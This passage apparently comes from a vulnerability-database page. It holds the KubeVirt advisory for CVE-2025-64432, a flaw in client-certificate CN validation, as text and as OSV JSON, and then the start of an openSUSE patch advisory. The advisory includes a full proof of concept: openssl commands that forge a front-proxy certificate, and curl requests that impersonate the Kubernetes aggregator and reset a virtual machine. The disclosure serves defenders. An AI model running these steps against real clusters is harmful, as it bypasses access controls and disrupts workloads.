ggEPADCCAQoCggEBALOFlqbM1h3uhTdU9XBZQ6AX8S7M0nT5SgSOSItJrVwjNUv/
t4FAQxnGPW7fhp9A9CeQ92DGLXkm88fgHCgnPJuodKgX8fS7NHfswvXKkgo6C4UO
2AmW0NAkuKMyTmf1tWugot7hj3sGFfIzVSLL73wm1Ci8unTaGKZG01ZZalL1kzz9
ObpmEn7DQvSJd7m5gALP4KPJdkFjoagMI4UlIownARl0h2DX5WAKy0ynGfEBvw+P
hEbuVPb+egeUVTn9/4JIqdUw21tUQrmbQqPib8BByueiOYqEerGxZDpLAxh230VG
Q6omoyUHjE6SIMBoUnAqAdLbTElVbLWJawlLZzECAwEAAaNdMFswDgYDVR0PAQH/
BAQDAgKkMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFPjiIeJVR7zQBCkpmkEa
I+70PxA8MBkGA1UdEQQSMBCCDmZyb250LXByb3h5LWNhMA0GCSqGSIb3DQEBCwUA
A4IBAQBiNTe9Sdv9RnKqTyt+Xj0NJrScVOiWPb9noO5XSyBtOy8F8b+ZWAtzc+eI
G/g6hpiT7lq3hVtmDNiE6nsP3tywXf0mgg7blRC0l3DxGtSzJZlbahAI4/U5yen7
orKiWiD/ObK2rGbt1toVRyvJzPi3hYjh4mA6GMyFbOC6snopNyM9oj+b/EuTCavf
l9WTNn2ZZQ1nYfJsLjOY5k/VtpZw1D/QwYt0u/A83RxEeBvK2aZPsq/nA0jqeHhe
VHauDQslkjMw0yrFc1b+Ju4Ly+BwH+Mi7ALUINc8EVncWZyM2L7B4N9XwPSp6YPX
fZnj69fu0JWfrq88M+LnKOyfkqi4
-----END CERTIFICATE-----
requestheader-extra-headers-prefix:
----
["X-Remote-Extra-"]
requestheader-group-headers:
----
["X-Remote-Group"]
requestheader-username-headers:
----
["X-Remote-User"]
client-ca-file:
----
-----BEGIN CERTIFICATE-----
MIIDBjCCAe6gAwIBAgIBATANBgkqhkiG9w0BAQsFADAVMRMwEQYDVQQDEwptaW5p
a3ViZUNBMB4XDTI1MDQxMTE3MzM1N1oXDTM1MDQxMDE3MzM1N1owFTETMBEGA1UE
AxMKbWluaWt1YmVDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALXK
ShgBkCDLETxDOSknvWHr7lfnvLtSCLf3VPVwFQNDhLAuFBc2H1MSMqzW6hcyxAVA
arQbOe36zxHjHpaP3VlGOEw3CVesPNw6ZToGuhpRq1inQATzeg2yc5w1jtRjLXhb
BWp7zCDk1qoHws/fWpaWOe3oQq4ZOA1+bJDsmZ7LjmMtOKHdqftEFz/RGVrn7nKD
/WXyGgKgSSNFsDK+Ow6gN6r3b10S82VQ5MwncJuqGO1r036yjwWBU8PEpknc/MhG
J/bMdI/w49rxlEAE92OadYRNvC0SDhG0HyPj9BMVx8ZG5X28lZMgq98UzVgu9Try
e8tndHqxUaU7rjO7j/8CAwEAAaNhMF8wDgYDVR0PAQH/BAQDAgKkMB0GA1UdJQQW
MBQGCCsGAQUFBwMCBggrBgEFBQcDATAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQW
BBS8FpfTfvGkXDPJEXUoTQs+MwVhPjANBgkqhkiG9w0BAQsFAAOCAQEAFg+gxZ7W
zZValzuoXSc3keutB4U0QXFzjOhTVo8D/qsBNkxasdsrYjF2Do/KuGxCefXRZbTe
QWX3OFhiiabd0nkGoNTxXoPqwOJHczk+bo8L2Vcva1JAi/tBVNkPULzZilZWgWQz
8d8NgABP7MpHnOJVvAr6BEaS1wpoLzyEMXm6YToZXjDX1ajzyyLonQ9So1Y7aj6v
yPQ8OO2TUhkEpzb28/s5Pr33QT8W0/FX3m8+MGSNvWdHNZ+UzXLk3iSfySgjmciZ
o4C5yKLZgKFxoFBxY25emr6QDZW+3HicZj6sPsblGlvlBF5wQgF65msgjvmRfTLq
JPwzd6yDCMUuZQ==
-----END CERTIFICATE-----
requestheader-allowed-names:
----
["front-proxy-client"]
BinaryData
====
Events: <none>
It is assumed that an attacker has obtained access to a Kubernetes pod and could communicate with virt-api reachable at 10.244.0.6.
root@compromised-pod:~$ curl -ks https://10.244.0.6:8443/ | jq .
{
"paths": [
"/apis",
"/openapi/v2",
"/apis/subresources.kubevirt.io",
"/apis/subresources.kubevirt.io/v1",
"/apis/subresources.kubevirt.io",
"/apis/subresources.kubevirt.io/v1alpha3"
]
}
The virt-api service has two types of endpoints -- authenticated and non-authenticated:
// pkg/authorizer/authorizer.go
var noAuthEndpoints = map[string]struct{}{
"/": {},
"/apis": {},
"/healthz": {},
"/openapi/v2": {},
// Although KubeVirt does not publish v3, Kubernetes aggregator controller will
// handle v2 to v3 (lossy) conversion if KubeVirt returns 404 on this endpoint
"/openapi/v3": {},
// The endpoints with just the version are needed for api aggregation discovery
// Test with e.g. kubectl get --raw /apis/subresources.kubevirt.io/v1
"/apis/subresources.kubevirt.io/v1": {},
"/apis/subresources.kubevirt.io/v1/version": {},
"/apis/subresources.kubevirt.io/v1/guestfs": {},
"/apis/subresources.kubevirt.io/v1/healthz": {},
"/apis/subresources.kubevirt.io/v1alpha3": {},
"/apis/subresources.kubevirt.io/v1alpha3/version": {},
"/apis/subresources.kubevirt.io/v1alpha3/guestfs": {},
"/apis/subresources.kubevirt.io/v1alpha3/healthz": {},
// the profiler endpoints are blocked by a feature gate
// to restrict the usage to development environments
"/start-profiler": {},
"/stop-profiler": {},
"/dump-profiler": {},
"/apis/subresources.kubevirt.io/v1/start-cluster-profiler": {},
"/apis/subresources.kubevirt.io/v1/stop-cluster-profiler": {},
"/apis/subresources.kubevirt.io/v1/dump-cluster-profiler": {},
"/apis/subresources.kubevirt.io/v1alpha3/start-cluster-profiler": {},
"/apis/subresources.kubevirt.io/v1alpha3/stop-cluster-profiler": {},
"/apis/subresources.kubevirt.io/v1alpha3/dump-cluster-profiler": {},
}
Each endpoint which is not in this list is considered an authenticated endpoint and requires a valid client certificate to be presented by the caller.
# trying to reach an API endpoint not in the above list would require client authentication
attacker@compromised-pod:~$ curl -ks https://10.244.0.6:8443/v1
request is not authenticated
To illustrate the vulnerability and attack scenario, below is generated a certificate signed by the front-proxy-ca but issued to an entity which is different than front-proxy-client (i.e the certificate has a different CN). Later on, it is assumed that the attacker has obtained access to the certificate bundle:
attacker@compromised-pod:~$ openssl ecparam -genkey -name prime256v1 -noout -out rogue-front-proxy.key
attacker@compromised-pod:~$ openssl req -new -key rogue-front-proxy.key -out rogue-front-proxy.csr -subj "/CN=crypt0n1t3/O=Quarkslab/C=Fr"
attacker@compromised-pod:~$ openssl x509 -req -in rogue-front-proxy.csr -CA front-proxy-ca.crt -CAkey front-proxy-ca.key -CAcreateserial -out
rogue-front-proxy.crt -days 365
The authentication will now succeed:
attacker@compromised-pod:~$ curl -ks --cert rogue-front-proxy.crt --key rogue-front-proxy.key https://10.244.0.6:8443/v1
a valid user header is required for authorization
To fully exploit the vulnerability, the attacker must also provide valid authentication HTTP headers:
attacker@compromised-pod:~$ curl -ks --cert rogue-front-proxy.crt --key rogue-front-proxy.key -H 'X-Remote-User:system:kube-aggregator' -H '
X-Remote-Group: system:masters' https://10.244.0.6:8443/v1
unknown api endpoint: /subresource.kubevirt.io/v1
The virt-api is a sub-resource extension server - it handles only requests for specific resources and sub-resources (requests having URIs prefixed with /apis/subresources.kubevirt.io/v1/). In reality, most of the requests that it accepts are actually executed by the virt-handler component and are related to the lifecycle of a VM.
Hence, virt-handler's API can be seen as aggregated within virt-api's API which in turn transforms it into a proxy.
The endpoints which are handled by virt-api are listed in the Swagger definitions available on GitHub @openapi-spec.
Resetting a Virtual Machine Instance
Consider the following deployed VirtualMachineInstance (VMI) within the default namespace:
apiVersion: kubevirt.io/v1
kind: VirtualMachineInstance
metadata:
namespace: default
name: mishandling-common-name-in-certificate-default
spec:
domain:
devices:
disks:
- name: containerdisk
disk:
bus: virtio
- name: cloudinitdisk
disk:
bus: virtio
resources:
requests:
memory: 1024M
terminationGracePeriodSeconds: 0
volumes:
- name: containerdisk
containerDisk:
image: quay.io/kubevirt/cirros-container-disk-demo
- name: cloudinitdisk
cloudInitNoCloud:
userDataBase64: SGkuXG4=
An attacker with a stolen external authentication proxy certificate could easily reset (hard reboot), freeze, or remove volumes from the virtual machine.
root@compromised-pod:~$ curl -ki --cert rogue-front-proxy.crt --key rogue-front-proxy.key -H 'X-Remote-User: system:kube-aggregator' -H 'X-Remote-Group: system:masters' https://10.244.0.6:8443/apis/subresources.kubevirt.io/v1/namespaces/default/virtualmachineinstances/mishandling-common-name-in-certificate-default/reset -XPUT
HTTP/1.1 200 OK
Date: Sun, 18 May 2025 16:43:26 GMT
Content-Length: 0
Impact
What kind of vulnerability is it? Who is impacted?
The virt-api component may allow an attacker to bypass existing RBAC controls by directly communicating with the aggregated API server, impersonating the Kubernetes API server and its aggregator component.
Severity ?
4.7 (Medium)
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "kubevirt.io/kubevirt"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.5.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "kubevirt.io/kubevirt"
},
"ranges": [
{
"events": [
{
"introduced": "1.6.0-alpha.0"
},
{
"fixed": "1.6.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "kubevirt.io/kubevirt"
},
"ranges": [
{
"events": [
{
"introduced": "1.7.0-alpha.0"
},
{
"fixed": "1.7.0-rc.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-64432"
],
"database_specific": {
"cwe_ids": [
"CWE-287",
"CWE-295"
],
"github_reviewed": true,
"github_reviewed_at": "2025-11-06T23:32:54Z",
"nvd_published_at": "2025-11-07T19:16:26Z",
"severity": "MODERATE"
},
"details": "### Summary\n_Short summary of the problem. Make the impact and severity as clear as possible.\n\nA flawed implementation of the Kubernetes aggregation layer\u0027s authentication flow could enable bypassing RBAC controls.\n\n### Details\n_Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer._\n\nIt was discovered that the `virt-api` component fails to correctly authenticate the client when receiving API requests over mTLS. In particular, it fails to validate the CN (Common Name) field in the received client TLS certificates against the set of allowed values defined in the `extension-apiserver-authentication` configmap. \n\nThe Kubernetes API server proxies received client requests through a component called aggregator (part of K8S\u0027s API server), and authenticates to the `virt-api` server using a certificate signed by the CA specified via the `--requestheader-client-ca-file` CLI flag. This CA bundle is primarily used in the context of aggregated API servers, where the Kubernetes API server acts as a trusted front-end proxy forwarding requests.\n\nWhile this is the most common use case, the same CA bundle can also support less common scenarios, such as issuing certificates to [authenticating](how-kubernetes-certificates-work) front-end [proxies](https://deepwiki.com/kubernetes/apiserver/7.1-authentication#request-header-authentication). These proxies can be deployed by organizations to extend Kubernetes\u0027 native authentication mechanisms or to integrate with existing identity systems (e.g., LDAP, OAuth2, SSO platforms). In such cases, the Kubernetes API server can trust these external proxies as legitimate authenticators, provided their client certificates are signed by the same CA as the one defined via `--requestheader-client-ca-file`.\nNevertheless, these external authentication proxies are not supposed to directly communicate with aggregated API servers.\n\nThus, by failing to validate the CN field in the client TLS certificate, the `virt-api` component may allow an attacker to bypass existing RBAC controls by directly communicating with the aggregated API server, impersonating the Kubernetes API server and its aggregator component.\n\nHowever, two key prerequisites must be met for successful exploitation:\n\n- The attacker must possess a valid front-end proxy certificate signed by the trusted CA (`requestheader-client-ca-file`). For example, they can steal the certificate material by compromising a front-end proxy or they could obtain a bundle by exploiting a poorly configured and managed PKI system.\n\n- The attacker must have network access to the `virt-api` service, such as via a compromised or controlled pod within the cluster.\n\nThese conditions significantly reduce the likelihood of exploitation. In addition, the `virt-api` component **acts as a sub-resource server**, meaning it only handles requests for specific resources and sub-resources . The handled by it requests are mostly related to the lifecycle of already existing resources.\n\nNonetheless, if met, the vulnerability could be exploited by a *Pod-Level Attacker* to escalate privileges, and manipulate existing virtual machine workloads potentially leading to violation of their CIA (Confidentiality, Integrity and Availability).\n\n### PoC\n_Complete instructions, including specific configuration details, to reproduce the vulnerability._\n\n#### Bypassing authentication\n\nIn this section, it is demonstrated how an attacker could use a certificate with a different CN field to bypass the authentication of the aggregation layer and perform arbitrary API sub-resource requests to the `virt-api` server.\n\nThe `kube-apiserver` has been launched with the following CLI flags:\n\n\n```bash\nadmin@minikube:~$ kubectl -n kube-system describe pod kube-apiserver-minikube | grep Command -A 28\n Command:\n kube-apiserver\n --advertise-address=192.168.49.2\n --allow-privileged=true\n --authorization-mode=Node,RBAC\n --client-ca-file=/var/lib/minikube/certs/ca.crt\n --enable-admission-plugins=NamespaceLifecycle,LimitRanger,ServiceAccount,DefaultStorageClass,DefaultTolerationSeconds,NodeRestriction,MutatingAdmissionWebhook,ValidatingAdmissionWebhook,ResourceQuota\n --enable-bootstrap-token-auth=true\n --etcd-cafile=/var/lib/minikube/certs/etcd/ca.crt\n --etcd-certfile=/var/lib/minikube/certs/apiserver-etcd-client.crt\n --etcd-keyfile=/var/lib/minikube/certs/apiserver-etcd-client.key\n --etcd-servers=https://127.0.0.1:2379\n --kubelet-client-certificate=/var/lib/minikube/certs/apiserver-kubelet-client.crt\n --kubelet-client-key=/var/lib/minikube/certs/apiserver-kubelet-client.key\n --kubelet-preferred-address-types=InternalIP,ExternalIP,Hostname\n --proxy-client-cert-file=/var/lib/minikube/certs/front-proxy-client.crt\n --proxy-client-key-file=/var/lib/minikube/certs/front-proxy-client.key\n --requestheader-allowed-names=front-proxy-client\n --requestheader-client-ca-file=/var/lib/minikube/certs/front-proxy-ca.crt\n --requestheader-extra-headers-prefix=X-Remote-Extra-\n --requestheader-group-headers=X-Remote-Group\n --requestheader-username-headers=X-Remote-User\n --secure-port=8443\n --service-account-issuer=https://kubernetes.default.svc.cluster.local\n --service-account-key-file=/var/lib/minikube/certs/sa.pub\n --service-account-signing-key-file=/var/lib/minikube/certs/sa.key\n --service-cluster-ip-range=10.96.0.0/12\n --tls-cert-file=/var/lib/minikube/certs/apiserver.crt\n --tls-private-key-file=/var/lib/minikube/certs/apiserver.key\n```\n\nBy default, Minikube generates a self-signed CA certificate (`var/lib/minikube/certs/front-proxy-ca.crt`) and use it to sign the certificate used by the aggregator (`/var/lib/minikube/certs/front-proxy-client.crt`):\n\n```bash\n# inspect the self-signed front-proxy-ca certificate\nadmin@minikube:~$ openssl x509 -text -in /var/lib/minikube/certs/front-proxy-ca.crt | grep -e \"Issuer:\" -e \"Subject:\"\n Issuer: CN = front-proxy-ca\n Subject: CN = front-proxy-ca\n# inspect the front-proxy-client certificate signed with the above cert\n$ openssl x509 -text -in /var/lib/minikube/certs/front-proxy-client.crt | grep -e \"Issuer:\" -e \"Subject:\"\n Issuer: CN = front-proxy-ca\n Subject: CN = front-proxy-client\n```\n\n\nOne can also inspect the contents of the `extension-apiserver-authentication` ConfigMap which is used as a trust anchor by all extension API servers:\n\n```bash\nadmin@minikube:~$ kubectl -n kube-system describe configmap extension-apiserver-authentication\nName: extension-apiserver-authentication\nNamespace: kube-system\nLabels: \u003cnone\u003e\nAnnotations: \u003cnone\u003e\n\nData\n====\nrequestheader-client-ca-file:\n----\n-----BEGIN CERTIFICATE-----\nMIIDETCCAfmgAwIBAgIIN59KhbrmeJkwDQYJKoZIhvcNAQELBQAwGTEXMBUGA1UE\nAxMOZnJvbnQtcHJveHktY2EwHhcNMjUwNTE4MTQzMTI3WhcNMzUwNTE2MTQzNjI3\nWjAZMRcwFQYDVQQDEw5mcm9udC1wcm94eS1jYTCCASIwDQYJKoZIhvcNAQEBBQAD\nggEPADCCAQoCggEBALOFlqbM1h3uhTdU9XBZQ6AX8S7M0nT5SgSOSItJrVwjNUv/\nt4FAQxnGPW7fhp9A9CeQ92DGLXkm88fgHCgnPJuodKgX8fS7NHfswvXKkgo6C4UO\n2AmW0NAkuKMyTmf1tWugot7hj3sGFfIzVSLL73wm1Ci8unTaGKZG01ZZalL1kzz9\nObpmEn7DQvSJd7m5gALP4KPJdkFjoagMI4UlIownARl0h2DX5WAKy0ynGfEBvw+P\nhEbuVPb+egeUVTn9/4JIqdUw21tUQrmbQqPib8BByueiOYqEerGxZDpLAxh230VG\nQ6omoyUHjE6SIMBoUnAqAdLbTElVbLWJawlLZzECAwEAAaNdMFswDgYDVR0PAQH/\nBAQDAgKkMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFPjiIeJVR7zQBCkpmkEa\nI+70PxA8MBkGA1UdEQQSMBCCDmZyb250LXByb3h5LWNhMA0GCSqGSIb3DQEBCwUA\nA4IBAQBiNTe9Sdv9RnKqTyt+Xj0NJrScVOiWPb9noO5XSyBtOy8F8b+ZWAtzc+eI\nG/g6hpiT7lq3hVtmDNiE6nsP3tywXf0mgg7blRC0l3DxGtSzJZlbahAI4/U5yen7\norKiWiD/ObK2rGbt1toVRyvJzPi3hYjh4mA6GMyFbOC6snopNyM9oj+b/EuTCavf\nl9WTNn2ZZQ1nYfJsLjOY5k/VtpZw1D/QwYt0u/A83RxEeBvK2aZPsq/nA0jqeHhe\nVHauDQslkjMw0yrFc1b+Ju4Ly+BwH+Mi7ALUINc8EVncWZyM2L7B4N9XwPSp6YPX\nfZnj69fu0JWfrq88M+LnKOyfkqi4\n-----END CERTIFICATE-----\n\n\nrequestheader-extra-headers-prefix:\n----\n[\"X-Remote-Extra-\"]\n\nrequestheader-group-headers:\n----\n[\"X-Remote-Group\"]\n\nrequestheader-username-headers:\n----\n[\"X-Remote-User\"]\n\nclient-ca-file:\n----\n-----BEGIN CERTIFICATE-----\nMIIDBjCCAe6gAwIBAgIBATANBgkqhkiG9w0BAQsFADAVMRMwEQYDVQQDEwptaW5p\na3ViZUNBMB4XDTI1MDQxMTE3MzM1N1oXDTM1MDQxMDE3MzM1N1owFTETMBEGA1UE\nAxMKbWluaWt1YmVDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALXK\nShgBkCDLETxDOSknvWHr7lfnvLtSCLf3VPVwFQNDhLAuFBc2H1MSMqzW6hcyxAVA\narQbOe36zxHjHpaP3VlGOEw3CVesPNw6ZToGuhpRq1inQATzeg2yc5w1jtRjLXhb\nBWp7zCDk1qoHws/fWpaWOe3oQq4ZOA1+bJDsmZ7LjmMtOKHdqftEFz/RGVrn7nKD\n/WXyGgKgSSNFsDK+Ow6gN6r3b10S82VQ5MwncJuqGO1r036yjwWBU8PEpknc/MhG\nJ/bMdI/w49rxlEAE92OadYRNvC0SDhG0HyPj9BMVx8ZG5X28lZMgq98UzVgu9Try\ne8tndHqxUaU7rjO7j/8CAwEAAaNhMF8wDgYDVR0PAQH/BAQDAgKkMB0GA1UdJQQW\nMBQGCCsGAQUFBwMCBggrBgEFBQcDATAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQW\nBBS8FpfTfvGkXDPJEXUoTQs+MwVhPjANBgkqhkiG9w0BAQsFAAOCAQEAFg+gxZ7W\nzZValzuoXSc3keutB4U0QXFzjOhTVo8D/qsBNkxasdsrYjF2Do/KuGxCefXRZbTe\nQWX3OFhiiabd0nkGoNTxXoPqwOJHczk+bo8L2Vcva1JAi/tBVNkPULzZilZWgWQz\n8d8NgABP7MpHnOJVvAr6BEaS1wpoLzyEMXm6YToZXjDX1ajzyyLonQ9So1Y7aj6v\nyPQ8OO2TUhkEpzb28/s5Pr33QT8W0/FX3m8+MGSNvWdHNZ+UzXLk3iSfySgjmciZ\no4C5yKLZgKFxoFBxY25emr6QDZW+3HicZj6sPsblGlvlBF5wQgF65msgjvmRfTLq\nJPwzd6yDCMUuZQ==\n-----END CERTIFICATE-----\n\n\nrequestheader-allowed-names:\n----\n[\"front-proxy-client\"]\n\n\nBinaryData\n====\n\nEvents: \u003cnone\u003e\n```\n\nIt is assumed that an attacker has obtained access to a Kubernetes pod and could communicate with `virt-api` reachable at `10.244.0.6`.\n\n```bash\nroot@compromised-pod:~$ curl -ks https://10.244.0.6:8443/ | jq .\n{\n \"paths\": [\n \"/apis\",\n \"/openapi/v2\",\n \"/apis/subresources.kubevirt.io\",\n \"/apis/subresources.kubevirt.io/v1\",\n \"/apis/subresources.kubevirt.io\",\n \"/apis/subresources.kubevirt.io/v1alpha3\"\n ]\n}\n```\n\nThe `virt-api` service has two types of endpoints -- authenticated and non-authenticated:\n\n```go\n// pkg/authorizer/authorizer.go\n\nvar noAuthEndpoints = map[string]struct{}{\n\t\"/\": {},\n\t\"/apis\": {},\n\t\"/healthz\": {},\n\t\"/openapi/v2\": {},\n\t// Although KubeVirt does not publish v3, Kubernetes aggregator controller will\n\t// handle v2 to v3 (lossy) conversion if KubeVirt returns 404 on this endpoint\n\t\"/openapi/v3\": {},\n\t// The endpoints with just the version are needed for api aggregation discovery\n\t// Test with e.g. kubectl get --raw /apis/subresources.kubevirt.io/v1\n\t\"/apis/subresources.kubevirt.io/v1\": {},\n\t\"/apis/subresources.kubevirt.io/v1/version\": {},\n\t\"/apis/subresources.kubevirt.io/v1/guestfs\": {},\n\t\"/apis/subresources.kubevirt.io/v1/healthz\": {},\n\t\"/apis/subresources.kubevirt.io/v1alpha3\": {},\n\t\"/apis/subresources.kubevirt.io/v1alpha3/version\": {},\n\t\"/apis/subresources.kubevirt.io/v1alpha3/guestfs\": {},\n\t\"/apis/subresources.kubevirt.io/v1alpha3/healthz\": {},\n\t// the profiler endpoints are blocked by a feature gate\n\t// to restrict the usage to development environments\n\t\"/start-profiler\": {},\n\t\"/stop-profiler\": {},\n\t\"/dump-profiler\": {},\n\t\"/apis/subresources.kubevirt.io/v1/start-cluster-profiler\": {},\n\t\"/apis/subresources.kubevirt.io/v1/stop-cluster-profiler\": {},\n\t\"/apis/subresources.kubevirt.io/v1/dump-cluster-profiler\": {},\n\t\"/apis/subresources.kubevirt.io/v1alpha3/start-cluster-profiler\": {},\n\t\"/apis/subresources.kubevirt.io/v1alpha3/stop-cluster-profiler\": {},\n\t\"/apis/subresources.kubevirt.io/v1alpha3/dump-cluster-profiler\": {},\n}\n```\n\nEach endpoint which is not in this list is considered an authenticated endpoint and requires a valid client certificate to be presented by the caller.\n\n```bash\n# trying to reach an API endpoint not in the above list would require client authentication\nattacker@compromised-pod:~$ curl -ks https://10.244.0.6:8443/v1\nrequest is not authenticated\n```\n\nTo illustrate the vulnerability and attack scenario, below is generated a certificate signed by the `front-proxy-ca` but issued to an entity which is different than `front-proxy-client` (i.e the certificate has a different CN). Later on, it is assumed that the attacker has obtained access to the certificate bundle:\n\n```bash\nattacker@compromised-pod:~$ openssl ecparam -genkey -name prime256v1 -noout -out rogue-front-proxy.key\nattacker@compromised-pod:~$ openssl req -new -key rogue-front-proxy.key -out rogue-front-proxy.csr -subj \"/CN=crypt0n1t3/O=Quarkslab/C=Fr\"\nattacker@compromised-pod:~$ openssl x509 -req -in rogue-front-proxy.csr -CA front-proxy-ca.crt -CAkey front-proxy-ca.key -CAcreateserial -out\n rogue-front-proxy.crt -days 365\n```\nThe authentication will now succeed:\n\n```bash\nattacker@compromised-pod:~$ curl -ks --cert rogue-front-proxy.crt --key rogue-front-proxy.key https://10.244.0.6:8443/v1\na valid user header is required for authorization\n```\n\nTo fully exploit the vulnerability, the attacker must also provide valid authentication HTTP headers:\n\n```bash\nattacker@compromised-pod:~$ curl -ks --cert rogue-front-proxy.crt --key rogue-front-proxy.key -H \u0027X-Remote-User:system:kube-aggregator\u0027 -H \u0027\nX-Remote-Group: system:masters\u0027 https://10.244.0.6:8443/v1\nunknown api endpoint: /subresource.kubevirt.io/v1\n```\n\nThe `virt-api` is a sub-resource extension server - it handles only requests for specific resources and sub-resources (requests having URIs prefixed with `/apis/subresources.kubevirt.io/v1/`). In reality, most of the requests that it accepts are actually executed by the `virt-handler` component and are related to the lifecycle of a VM. \n\nHence, `virt-handler`\u0027s API can be seen as aggregated within `virt-api`\u0027s API which in turn transforms it into a proxy. \n\nThe endpoints which are handled by `virt-api` are listed in the Swagger definitions available on GitHub @openapi-spec.\n\n#### Resetting a Virtual Machine Instance \n\nConsider the following deployed `VirtualMachineInstance` (VMI) within the default namespace:\n\n```yaml\napiVersion: kubevirt.io/v1\nkind: VirtualMachineInstance\nmetadata:\n namespace: default\n name: mishandling-common-name-in-certificate-default\nspec:\n domain:\n devices:\n disks:\n - name: containerdisk\n disk:\n bus: virtio\n\n - name: cloudinitdisk\n disk:\n bus: virtio\n resources:\n requests:\n memory: 1024M\n terminationGracePeriodSeconds: 0\n volumes:\n - name: containerdisk\n containerDisk:\n image: quay.io/kubevirt/cirros-container-disk-demo\n - name: cloudinitdisk \n cloudInitNoCloud:\n userDataBase64: SGkuXG4=\n```\n\nAn attacker with a stolen external authentication proxy certificate could easily reset (hard reboot), freeze, or remove volumes from the virtual machine.\n\n```bash\nroot@compromised-pod:~$ curl -ki --cert rogue-front-proxy.crt --key rogue-front-proxy.key -H \u0027X-Remote-User: system:kube-aggregator\u0027 -H \u0027X-Remote-Group: system:masters\u0027 https://10.244.0.6:8443/apis/subresources.kubevirt.io/v1/namespaces/default/virtualmachineinstances/mishandling-common-name-in-certificate-default/reset -XPUT\n\nHTTP/1.1 200 OK\nDate: Sun, 18 May 2025 16:43:26 GMT\nContent-Length: 0\n```\n\n\n### Impact\n_What kind of vulnerability is it? Who is impacted?_\n\nThe `virt-api` component may allow an attacker to bypass existing RBAC controls by directly communicating with the aggregated API server, impersonating the Kubernetes API server and its aggregator component.",
"id": "GHSA-38jw-g2qx-4286",
"modified": "2025-11-17T21:44:45Z",
"published": "2025-11-06T23:32:54Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-38jw-g2qx-4286"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64432"
},
{
"type": "WEB",
"url": "https://github.com/kubevirt/kubevirt/commit/231dc69723f331dc02f65a31ab4c3d6869f40d6a"
},
{
"type": "WEB",
"url": "https://github.com/kubevirt/kubevirt/commit/af2f08a9a186eccc650f87c30ab3e07b669e8b5b"
},
{
"type": "WEB",
"url": "https://github.com/kubevirt/kubevirt/commit/b9773bc588e6e18ece896a2dad5336ef7a653074"
},
{
"type": "PACKAGE",
"url": "https://github.com/kubevirt/kubevirt"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "KubeVirt Affected by an Authentication Bypass in Kubernetes Aggregation Layer "
}
OPENSUSE-SU-2026:20281-1
Vulnerability from csaf_opensuse - Published: 2026-02-27 08:51 - Updated: 2026-02-27 08:51Summary
Security update for kubevirt
Notes
Title of the patch
Security update for kubevirt
Description of the patch
This update for kubevirt fixes the following issues:
Update to version 1.7.0 (bsc#1257128).
Security issues fixed:
- CVE-2025-64435: logic flaw in the virt-controller can lead to incorrect status updates and potentially causing a DoS
(bsc#1253189).
- CVE-2024-45310: kubevirt vendored github.com/opencontainers/runc/libcontainer/utils: runc can be tricked into
creating empty files/directories on host (bsc#1257422).
- CVE-2025-22872: incorrectly interpreted tags can cause content to be placed wrong scope during DOM construction
(bsc#1241772).
- CVE-2025-64432: fail to correctly validate certain fields in the client TLS certificate may allow an attacker to
bypass existing RBAC controls (bsc#1253181).
- CVE-2025-64433: improper symlink handling can allow to read arbitrary files (bsc#1253185).
- CVE-2025-64434: compromising virt-handler instance can lead to impersonate virt-api and execute privileged operations
(bsc#1253186).
- CVE-2025-64437: mishandling of symlinks can lead to compromising the CIA (bsc#1253194).
- CVE-2025-64324: a logic bug that allows an attacker to read and write arbitrary files owned by more privileged users
(bsc#1253748).
Other updates and bugfixes:
- Upstream now uses stateless firmware for CoCo VMs.
Patchnames
openSUSE-Leap-16.0-319
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for kubevirt",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for kubevirt fixes the following issues:\n\nUpdate to version 1.7.0 (bsc#1257128).\n\nSecurity issues fixed:\n\n - CVE-2025-64435: logic flaw in the virt-controller can lead to incorrect status updates and potentially causing a DoS\n (bsc#1253189).\n - CVE-2024-45310: kubevirt vendored github.com/opencontainers/runc/libcontainer/utils: runc can be tricked into\n creating empty files/directories on host (bsc#1257422).\n - CVE-2025-22872: incorrectly interpreted tags can cause content to be placed wrong scope during DOM construction\n (bsc#1241772).\n - CVE-2025-64432: fail to correctly validate certain fields in the client TLS certificate may allow an attacker to\n bypass existing RBAC controls (bsc#1253181).\n - CVE-2025-64433: improper symlink handling can allow to read arbitrary files (bsc#1253185).\n - CVE-2025-64434: compromising virt-handler instance can lead to impersonate virt-api and execute privileged operations\n (bsc#1253186).\n - CVE-2025-64437: mishandling of symlinks can lead to compromising the CIA (bsc#1253194).\n - CVE-2025-64324: a logic bug that allows an attacker to read and write arbitrary files owned by more privileged users\n (bsc#1253748).\n\nOther updates and bugfixes:\n\n - Upstream now uses stateless firmware for CoCo VMs.\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Leap-16.0-319",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
